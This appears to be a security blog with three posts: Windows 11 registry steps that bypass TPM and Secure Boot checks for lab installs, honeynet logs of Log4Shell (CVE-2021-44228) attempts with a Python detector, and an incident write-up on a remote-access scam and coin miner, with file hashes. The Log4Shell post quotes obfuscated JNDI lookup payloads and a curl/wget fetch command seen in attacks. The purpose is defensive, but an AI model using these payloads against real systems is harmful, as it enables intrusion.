Thursday, December 23, 2021

Bypass the security and TPM requirements on Windows 11 for lab testing.


  • For security and lab testing during a Windows 11 install, you can bypass some of the hardware requirement checks. During the install you will see a message stating "This PC can't run Windows 11." because setup is blocked by missing hardware requirements.
  • When you see the above message, press Shift+F10 on your keyboard to launch a command prompt. Type regedit and press Enter to launch the Registry Editor.


  • When the Registry Editor opens, navigate to HKEY_LOCAL_MACHINE\SYSTEM\Setup, right-click the Setup key and select New > Key.
  • When prompted to name the key, type LabConfig and press Enter.
  • Next, right-click the LabConfig key, select New > DWORD (32-bit) Value, name the value BypassTPMCheck, and set its data to 1.
  • Also create a DWORD (32-bit) value named BypassSecureBootCheck and set its data to 1 (for older machines that have no Secure Boot option, roughly pre-2010).
  • For very old CPUs, also navigate to HKEY_LOCAL_MACHINE\SYSTEM\Setup\MoSetup, create a DWORD (32-bit) value named AllowUpgradesWithUnsupportedTPMOrCPU and set it to 1; without it, setup would not install on a machine with less than a 2nd-generation i5.


  • Now close the new windows, press Back, select the correct edition (Home, Pro, etc.), and you will no longer see the "This PC can't run Windows 11." screen.



Monday, December 13, 2021

CVE-2021-44228 exploitation example Canada Cyber

CVE-2021-44228

CanadaCyber honeynet logging data over the last 3 days.

We see: 

Actions: "curl -s. RemoteActor:5874/CCyberPubIP:80||wget -q -O- , 

The most recent hits are coming in with obfuscation:

RemoteActor HTTP/1.1 ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-"
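To catch the obfuscated form above, a detector has to resolve Log4j's `${...:-default}`, `${lower:x}` and `${upper:x}` lookups before searching for `jndi:`. The following is an added example (not part of the honeynet data or this post) that normalizes nested lookups and flags probe lines; the sample log lines and the 192.0.2.0/24 and 203.0.113.0/24 addresses in them are constructed documentation-range values.

```python
import re

# Constructed sample access-log lines (not real honeynet data).
SAMPLE_LOGS = [
    '203.0.113.7 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.8 - - "GET / HTTP/1.1" 404 "${jndi:ldap://192.0.2.10:1389/a}"',
    # Same payload, each letter hidden behind an empty lookup with a default value.
    '203.0.113.9 - - "GET / HTTP/1.1" 404 '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://192.0.2.10:1389/a}"',
    # Mixed lower/upper lookups; Log4j matches the lookup name case-insensitively.
    '203.0.113.10 - - "GET / HTTP/1.1" 404 "${${lower:j}${upper:n}di:${lower:ldap}://192.0.2.10/a}"',
]

# Innermost lookups only (no nested ${ } inside); outer levels are handled by
# repeating the substitution until nothing changes.
_DEFAULT = re.compile(r'\$\{[^${}]*?:-([^${}]*)\}')      # ${anything:-default} -> default
_CASE = re.compile(r'\$\{(lower|upper):([^${}]*)\}')     # ${lower:x} / ${upper:x}


def normalize(s: str, max_rounds: int = 20) -> str:
    """Resolve nested default/case lookups inside out; bounded to stop pathological input."""
    for _ in range(max_rounds):
        new = _DEFAULT.sub(lambda m: m.group(1), s)
        new = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1) == 'lower' else m.group(2).upper(), new)
        if new == s:
            break
        s = new
    return s


_JNDI = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)


def is_log4shell_probe(line: str) -> bool:
    """True when the de-obfuscated line contains a JNDI lookup."""
    return bool(_JNDI.search(normalize(line)))


def scan(lines):
    """Return the subset of lines that look like CVE-2021-44228 probes."""
    return [line for line in lines if is_log4shell_probe(line)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print("PROBE:", hit)
```

The lookups resolved here are the ones seen in the honeynet traffic; other Log4j lookups (for example `${env:...}` with a default) fall under the same `:-` rule, but any lookup not reduced by `normalize` will be missed, so keep the regex list in step with what you observe.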



Local Ottawa man laptop compromised by distributed Bitcoin miner.


This all started with a phone call from someone pretending to be his local RRSP representative. After some social engineering, the hacker got the 70-year-old man to install the AnyDesk software and provide remote access.

A quick look in the Downloads folder shows:



Based on timestamps, we can see that the hacker got in via a legitimate version of AnyDesk. He then used locally saved banking information to create a Bitcoin account; we also see evidence of a bank transfer:


We later see the installation of a variety of tools that gave the threat actor the ability to install coin-mining software.

IOCs:

https://www.virustotal.com/gui/file/825729b8f0ce7215119a4035f6d0267a05466fd939f598f848341f3631a0a631

https://www.virustotal.com/gui/file/92b979d18973399b806f50bd4651445d7578f60c7a8b18e4ee761cd06de795e6


Other files of interest:

https://www.virustotal.com/gui/file/2294dbb4c42acca41c46ea5eebc3f5aa10ff1b0d200b4729fcefeda5321294ba/detection

https://www.virustotal.com/gui/file/930a03cb70737c49651fb96114fd3816aeb311d19cfadf312a35107924eca555